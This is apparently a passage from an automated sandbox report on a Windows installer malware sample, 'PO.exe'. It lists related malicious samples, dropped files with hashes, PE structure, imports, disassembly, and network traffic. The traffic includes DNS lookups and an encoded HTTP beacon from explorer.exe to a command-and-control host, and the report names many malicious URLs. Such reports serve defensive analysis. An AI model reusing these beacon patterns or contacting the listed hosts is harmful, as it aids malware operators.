	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtf	Get hash	malicious	Browse	www.buyleasenames.com/th9/?MbCdXj=rmVgIP7NLqu5IqLfwUaZy5YpunnORz1e2lJnxDx+qK6UmpGhFXMhTGrvGFqOmXv+78GrdA==&1bL0=nN6tXVY0-tVP_b
	inv.exe	Get hash	malicious	Browse	www.pompanodogtrainers.com/tabo/?uFQh=t2k4hn5TmbxwPjUurJswVrDNAFkjO32ahLMl0tqguGOf6hevZwPAKcE0/42AiwGFl7gy&CTvX=cvUhPfRP
	h3dFAROdF3.exe	Get hash	malicious	Browse	www.dog2meeting.com/jskg/?8pgD2lkp=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxtnR1X6Bv9&yTIDml=X6XHfZU8d
	d2mISAbTQN.exe	Get hash	malicious	Browse	www.dog2meeting.com/jskg/?Hr=V48HzvXX&v4=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49Odu7h5v3gSr//fqzw==
	n41pVXkYCe.exe	Get hash	malicious	Browse	www.bootyfashions.com/jskg/?8pJPDtoX=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctryp5FdPNoXwMPrDtw==&CvL0=inCTmHzH
	kqwqyoFz1C.exe	Get hash	malicious	Browse	www.dog2meeting.com/jskg/?9roHn=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxtnR1X6Bv9&npHhW=3fq4gDD0abs8
	BsR85tOyjL.exe	Get hash	malicious	Browse	www.bootyfashions.com/jskg/?V4=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctoeA6Fh3ELim&Uzu8J=Szrd3PcPWlV
	Z4bamJ91oo.exe	Get hash	malicious	Browse	www.bootyfashions.com/jskg/?inKP_TF0=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctr+Q1kxPauLh&oneha=xPMpsZU8
	zISJXAAewo.exe	Get hash	malicious	Browse	www.dog2meeting.com/jskg/?1bwHc=yVMpBJZhmT_xj43&Rl=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxH4hFX+Dn9
	zISJXAAewo.exe	Get hash	malicious	Browse	www.bootyfashions.com/jskg/?X2JtLRIH=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctoeql1R3AJqm&blv=UVIpcz0pIRTp
	uqAU5Vneod.exe	Get hash	malicious	Browse	www.bootyfashions.com/jskg/?afcTJPQ8=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctryp5FdPNoXwMPrDtw==&cxoT9=yhvp2Xfp
	P0_4859930058_NEW_0RDER.xlsx	Get hash	malicious	Browse	www.bootyfashions.com/jskg/?oBN0yB=B6OS4EeIWk1Jsyxdn2yENkMcFrDOqbu3f1B3YoxAEyFagbjyCITSDbzeuNyW+VlEPI/WVw==&2dhH=XHE0vBK
	KWOgblwL7W.exe	Get hash	malicious	Browse	www.keebcat.com/d9s8/?J48Lz0S0=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&ArR=YVcTxLcP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
pixie.porkbun.com	PO4308.exe	Get hash	malicious	Browse	44.227.76.166
	pumYguna1i.exe	Get hash	malicious	Browse	44.227.76.166
	DYANAMIC Inquiry.xlsx	Get hash	malicious	Browse	44.227.76.166
	comprobante de pago bancario.exe	Get hash	malicious	Browse	44.227.76.166
	DHL Shipping Documents.exe	Get hash	malicious	Browse	44.227.76.166
	PDF NEW P.OJerhWEMSj4RnE4Z.exe	Get hash	malicious	Browse	44.227.65.245
	Proforma Invoice 2.xlsx	Get hash	malicious	Browse	44.227.65.245
	Transfer Form.exe	Get hash	malicious	Browse	44.227.65.245
	7Q5Er1TObp.exe	Get hash	malicious	Browse	44.227.65.245
	foHzqhWjvn.exe	Get hash	malicious	Browse	44.227.65.245
	27hKPHrVa3.exe	Get hash	malicious	Browse	44.227.65.245
	NEW ORDER QUOTATION.xlsx	Get hash	malicious	Browse	44.227.65.245
	NEW ORDER.xlsx	Get hash	malicious	Browse	44.227.65.245
	Invoice #0023228 PDF.exe	Get hash	malicious	Browse	44.227.65.245
	SWIFT.exe	Get hash	malicious	Browse	44.227.65.245
	proposal.xlsm	Get hash	malicious	Browse	44.227.76.166
	ezr37taArt.exe	Get hash	malicious	Browse	44.227.76.166
	Soa.doc	Get hash	malicious	Browse	44.227.76.166
	RFQ TK011821.doc	Get hash	malicious	Browse	44.227.65.245
	SCAN_20210112_132640143,pdf.exe	Get hash	malicious	Browse	44.227.76.166

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UDMEDIA-ASDE	sample.exe	Get hash	malicious	Browse	194.117.254.45
	qZpkW36P5i.exe	Get hash	malicious	Browse	194.117.254.45
	Emotet.doc	Get hash	malicious	Browse	194.117.254.33
AMAZON-02US	invoice.exe	Get hash	malicious	Browse	35.156.117.131
	Calt7BoW2a.exe	Get hash	malicious	Browse	3.14.206.30
	0BAdCQQVtP.exe	Get hash	malicious	Browse	52.40.12.112
	TazxfJHRhq.exe	Get hash	malicious	Browse	52.216.152.43
	1wOdXavtlE.exe	Get hash	malicious	Browse	52.216.179.59
	hvEop8Y70Y.exe	Get hash	malicious	Browse	15.165.26.252
	8sxgohtHjM.exe	Get hash	malicious	Browse	3.13.255.157
	eQLPRPErea.exe	Get hash	malicious	Browse	13.248.216.40
	vbc.exe	Get hash	malicious	Browse	3.13.255.157
	o2KKHvtb3c.exe	Get hash	malicious	Browse	18.218.104.192
	Order Inquiry.exe	Get hash	malicious	Browse	3.14.206.30
	6IGbftBsBg.exe	Get hash	malicious	Browse	104.192.141.1
	nicoleta.fagaras-DHL_TRACKING_1394942.html	Get hash	malicious	Browse	52.218.213.96
	PaymentAdvice.exe	Get hash	malicious	Browse	3.14.206.30
	ikoAImKWvI.exe	Get hash	malicious	Browse	104.192.141.1
	BL01345678053567.exe	Get hash	malicious	Browse	3.14.206.30
	AL JUNEIDI LIST.xlsx	Get hash	malicious	Browse	65.0.168.152
	DYANAMIC Inquiry.xlsx	Get hash	malicious	Browse	65.0.168.152
	Statement of Account.xlsx	Get hash	malicious	Browse	15.165.26.252
	Shipping Documents.xlsx	Get hash	malicious	Browse	52.217.8.51

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0c1xisnj7gzhsxz Download File
Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	186368
Entropy (8bit):	7.9990308732293505
Encrypted:	true
SSDEEP:	3072:dxXjk0A3knDWFylq12Hk4MSxUt0SaGFUw8JIkV+6H3PoH/BIbrAIVxI:dNjU3kn46q2k43OFU2kV++wmb9VW
MD5:	020124B82D8A5F3837DAE65C84839A13
SHA1:	E11D3587563B303BAE663D8B4F634D70E6FFF54A
SHA-256:	49CA2A8DDC46ED5FDD3C8DFF58683CACD0C8445A6675E01E0E422BB5B8729659
SHA-512:	864086161DD9A53B20A89933E4F73A082E829D5B944C784A4EB3BFC6CBF1E47E69AF2E8C0DC31BA28F479FB3AE54103BA013F821B05B0A6759BD3B100FC77873
Malicious:	false
Reputation:	low
Preview:	KUxm~...m......Z.$.Xd..@..N.....[y.=Hy.....o...R.....X..z..:. .&.i...3q....,....JZ..gx...}.QQ........x..d.;'.....(~.. .%.....<...#.%&....r....._U.8k.Uz..tZ...\|r.../...{......v....-a].\|...7.F.U..h.2...v.....H.uvM.d.p.1.Lc......:.....W.@..1gdTUs.C......{%...jrV.K1._...O.z...cM.R:.a.xj..RZ.d.[f_~m..hg[..F._..3~z...BA.S....y.ha,_rJ..8.c...?.EF..R.+...$b.....V.).'.{...L}....#...Q..........W..5.Xjxt..&.h.U..._...K]p)l..<P..f..9..oV`......... ./&.]\|..L$.ck..PP.....3q../.W^...?......&.k$...R.b.....1Gd..A5.....@v...B.3..\|<p.}.rB%...An..-.;..?v.bsH..b...F.t.T..(9-k.%+v...G.....+[R.......9.0.ud..0.Ib.o....o......9..W.....Ma.i..$x9..)).......l8..`./.<Ak....B..L#.....Am......T.....I.Z..Y~y...Z.V..r......@.....$..L.1...hH&.G......\....?.4.p&.H..............wB.1..@..v..;.c.C<.$.j!'....k8CSD..J...2H=e..l6R..Z^..j...b....s...<.!j.O8......b`.L#:.H.....!.@.^.~.Z.@......r...}....P0M....]j...@..k..P.3...s.......N..k.W.[.......;.s8,.H.a....(.#Ln.r.x..tM6......

C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll Download File
Process:	C:\Users\user\Desktop\PO.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.1361599484937495
Encrypted:	false
SSDEEP:	48:vpgNQILdkQpZXsXvPviTLNuLebdsbriB4ZYmR:Bc+8pmvPvinktfiuZVR
MD5:	7DA758941832369963F45B31B4BE74EB
SHA1:	775719B94BF9E81CD4E2A99DC3ECB2DF61020129
SHA-256:	D68BF256D203EB2B6630F8D9D5FF63AE674ADB94D0BE58BDD2CE9E6C9269CA30
SHA-512:	45EE9A16381067CC06D1954E41A17DE62E64B3AAF4A6E9307D8A9EBAAD4CB644D3F2C903EB0A61B75FB65E01D6B128525BAA9856BAFE766D5CE1A4B330FF0BF2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 10%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L... ..............................................$"...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yfmgdsfcotdgfk Download File
Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	6661
Entropy (8bit):	7.9543287169682415
Encrypted:	false
SSDEEP:	192:A4CaC0frJWuNQpQc4H9aEmBkcXntsB5DaCW:APazDJspX4GmikW
MD5:	25891C3E29F2C303C026F8716C29F1BE
SHA1:	D1A289B1CB960EB9987DB9488D76D9C5553CCBBB
SHA-256:	A6DFD0BD1725F7B948ED304A77F403345C750E9A41E1F8526CD509D192E6FD76
SHA-512:	339FD62334C78DC483F370AE5521CFA1BA757647D67D02BCE80CAD8914E84B3CDC9E798A72BE2DA24D4157AD2ADD7D5F5481D850B0E123C644F5711232F233D9
Malicious:	false
Reputation:	low
Preview:	.....#....O.... z.(>...q\|...k.......y.fb...:...v9..().yZ....>Z.P..k..3.5=U....2.z..gK...n=.......H.q.........~.,ny..o.....4t.-5..JA..2K.c.8...S.9Z.}u....[....,....z&..k ...8..4.i.{B...GX...0+\|U=.eA.C..:...e.$?V_.!.9.....a..pX..@...aB9d....O..!{o....[K.}.....%.Z1.0.....F.....c..I.R..:\|(M....U.4.z.2..........c..0[.M.....J..[z..v.{.q..../#G6.4P..d.5.q.>@.....t/P.n.7.e.0.....l..x...u....r.#.,.\|G.u.y..4&.4P%.'HJ2c....Y....P.^.O.x.@N..a.e....:..<..mE..f...B..6.!.9.+K......a....^..J.&d.m<...7.Xp.X...)..(...BzZ....mI.......b...........-.X)....4j.E....W7........tC... ......0.fi...j..f].N....LZ.v..0........FL.d.&.t.Y...?..Xtg...T.l.!OE.~.A\|y..2O.wX.....z jiBq..%82...z>d}<\.`<e..G.g..-.JC..:..;".B[;y....S2y..v.....7..R..J....E......v..wg..4,.X......u...b./.G.....t{.e...>q=?.....~Z_..........'../.O......XM...4.{...0.)........nB.!._.)..Z@.....B...G1o6l.a...t.ON...u.F.M....d-..Z.E......7...r..Hj2z&?......,J...P..kmr%...e..}..U`.....mNY.._.&9..y..Ih.A.l8.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.917905190852182
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO.exe
File size:	228037
MD5:	665cb19601850467af3ee7d9fd0e0350
SHA1:	8ac40ef9fa5100a39b14258d8d8e562cefd7202c
SHA256:	f3147300f9248e07ffd3a1b7131bed4febad8b0a88eeda27e606f36d04ff1340
SHA512:	106e612d3a8aa36034cb534c87930b4013fcad08d338e7224b0245b305f963a28975e2f36f84a9b48f2d517e6c98285c24146adb9c2ebac9088fc3f379a0ef7b
SSDEEP:	3072:HyewmN4skJ6/rfxXjk0A3knDWFylq12Hk4MSxUt0SaGFUw8JIkV+6H3PoH/BIbrN:Hd7bNjU3kn46q2k43OFU2kV++wmb9V5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40314a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	18bc6fa81e19f21156316b1ae696ed6b

Entrypoint Preview

Instruction
sub esp, 0000017Ch
push ebx
push ebp
push esi
xor esi, esi
push edi
mov dword ptr [esp+18h], esi
mov ebp, 00409240h
mov byte ptr [esp+10h], 00000020h
call dword ptr [00407030h]
push esi
call dword ptr [00407270h]
mov dword ptr [007A3030h], eax
push esi
lea eax, dword ptr [esp+30h]
push 00000160h
push eax
push esi
push 0079E540h
call dword ptr [00407158h]
push 00409230h
push 007A2780h
call 00007F2258D7E2A8h
mov ebx, 007AA400h
push ebx
push 00000400h
call dword ptr [004070B4h]
call 00007F2258D7B9E9h
test eax, eax
jne 00007F2258D7BAA6h
push 000003FBh
push ebx
call dword ptr [004070B0h]
push 00409228h
push ebx
call 00007F2258D7E293h
call 00007F2258D7B9C9h
test eax, eax
je 00007F2258D7BBC2h
mov edi, 007A9000h
push edi
call dword ptr [00407140h]
call dword ptr [004070ACh]
push eax
push edi
call 00007F2258D7E251h
push 00000000h
call dword ptr [00407108h]
cmp byte ptr [007A9000h], 00000022h
mov dword ptr [007A2F80h], eax
mov eax, edi
jne 00007F2258D7BA8Ch
mov byte ptr [esp+10h], 00000022h
mov eax, 00000001h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7344	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ac000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x280	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x59de	0x5a00	False	0.681293402778	data	6.5143386598	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x10f2	0x1200	False	0.430338541667	data	5.0554281206	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x39a034	0x400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x3a4000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3ac000	0x900	0xa00	False	0.409375	data	3.94574916515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3ac190	0x2e8	data	English	United States
RT_DIALOG	0x3ac478	0x100	data	English	United States
RT_DIALOG	0x3ac578	0x11c	data	English	United States
RT_DIALOG	0x3ac698	0x60	data	English	United States
RT_GROUP_ICON	0x3ac6f8	0x14	data	English	United States
RT_MANIFEST	0x3ac710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll	ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 12:10:12.314201117 CEST	49693	80	192.168.2.5	194.117.254.63
Apr 8, 2021 12:10:12.331975937 CEST	80	49693	194.117.254.63	192.168.2.5
Apr 8, 2021 12:10:12.333208084 CEST	49693	80	192.168.2.5	194.117.254.63
Apr 8, 2021 12:10:12.333529949 CEST	49693	80	192.168.2.5	194.117.254.63
Apr 8, 2021 12:10:12.350931883 CEST	80	49693	194.117.254.63	192.168.2.5
Apr 8, 2021 12:10:12.351783037 CEST	80	49693	194.117.254.63	192.168.2.5
Apr 8, 2021 12:10:12.351804018 CEST	80	49693	194.117.254.63	192.168.2.5
Apr 8, 2021 12:10:12.353475094 CEST	49693	80	192.168.2.5	194.117.254.63
Apr 8, 2021 12:10:12.353513956 CEST	49693	80	192.168.2.5	194.117.254.63
Apr 8, 2021 12:10:12.371041059 CEST	80	49693	194.117.254.63	192.168.2.5
Apr 8, 2021 12:10:32.768593073 CEST	49694	80	192.168.2.5	44.227.76.166
Apr 8, 2021 12:10:32.934870958 CEST	80	49694	44.227.76.166	192.168.2.5
Apr 8, 2021 12:10:32.934983015 CEST	49694	80	192.168.2.5	44.227.76.166
Apr 8, 2021 12:10:33.100056887 CEST	80	49694	44.227.76.166	192.168.2.5
Apr 8, 2021 12:10:33.100172997 CEST	49694	80	192.168.2.5	44.227.76.166
Apr 8, 2021 12:10:33.265103102 CEST	80	49694	44.227.76.166	192.168.2.5
Apr 8, 2021 12:10:33.269149065 CEST	80	49694	44.227.76.166	192.168.2.5
Apr 8, 2021 12:10:33.269192934 CEST	80	49694	44.227.76.166	192.168.2.5
Apr 8, 2021 12:10:33.269349098 CEST	49694	80	192.168.2.5	44.227.76.166
Apr 8, 2021 12:10:33.269407034 CEST	49694	80	192.168.2.5	44.227.76.166
Apr 8, 2021 12:10:33.437623024 CEST	80	49694	44.227.76.166	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 12:08:21.699332952 CEST	56798	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:21.733257055 CEST	53	56798	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:21.852818966 CEST	52480	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:21.865542889 CEST	53	52480	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:30.327725887 CEST	51165	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:30.339555979 CEST	53	51165	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:31.201592922 CEST	53183	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:31.214391947 CEST	53	53183	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:32.134387016 CEST	57587	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:32.148320913 CEST	53	57587	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:38.045337915 CEST	55432	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:38.057888985 CEST	53	55432	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:40.378134012 CEST	64936	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:40.390716076 CEST	53	64936	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:46.192307949 CEST	52704	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:46.209988117 CEST	53	52704	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:51.159001112 CEST	52212	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:51.175426006 CEST	53	52212	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:53.754745007 CEST	54302	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:53.766885996 CEST	53	54302	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:55.126512051 CEST	53784	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:55.139259100 CEST	53	53784	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:56.251838923 CEST	65307	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:56.264457941 CEST	53	65307	8.8.8.8	192.168.2.5
Apr 8, 2021 12:08:57.022464037 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:08:57.035022974 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 8, 2021 12:09:01.906601906 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:09:01.919754982 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 8, 2021 12:09:51.705511093 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:09:52.035056114 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 8, 2021 12:10:12.245260954 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:10:12.307060003 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 8, 2021 12:10:32.642216921 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 8, 2021 12:10:32.767242908 CEST	53	49557	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 12:09:51.705511093 CEST	192.168.2.5	8.8.8.8	0x5d97	Standard query (0)	www.cwyxonlp.icu	A (IP address)	IN (0x0001)
Apr 8, 2021 12:10:12.245260954 CEST	192.168.2.5	8.8.8.8	0x1	Standard query (0)	www.websiteworlda-z.com	A (IP address)	IN (0x0001)
Apr 8, 2021 12:10:32.642216921 CEST	192.168.2.5	8.8.8.8	0xb793	Standard query (0)	www.phorice.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 12:09:52.035056114 CEST	8.8.8.8	192.168.2.5	0x5d97	Name error (3)	www.cwyxonlp.icu	none	none	A (IP address)	IN (0x0001)
Apr 8, 2021 12:10:12.307060003 CEST	8.8.8.8	192.168.2.5	0x1	No error (0)	www.websiteworlda-z.com		194.117.254.63	A (IP address)	IN (0x0001)
Apr 8, 2021 12:10:32.767242908 CEST	8.8.8.8	192.168.2.5	0xb793	No error (0)	www.phorice.com	pixie.porkbun.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 12:10:32.767242908 CEST	8.8.8.8	192.168.2.5	0xb793	No error (0)	pixie.porkbun.com		44.227.76.166	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.websiteworlda-z.com

www.phorice.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49693	194.117.254.63	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 12:10:12.333529949 CEST	332	OUT	GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1 Host: www.websiteworlda-z.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 12:10:12.351783037 CEST	333	IN	HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 10:10:12 GMT Server: Apache Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 65 62 73 69 74 65 77 6f 72 6c 64 61 2d 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.websiteworlda-z.com Port 80</address></body></html>

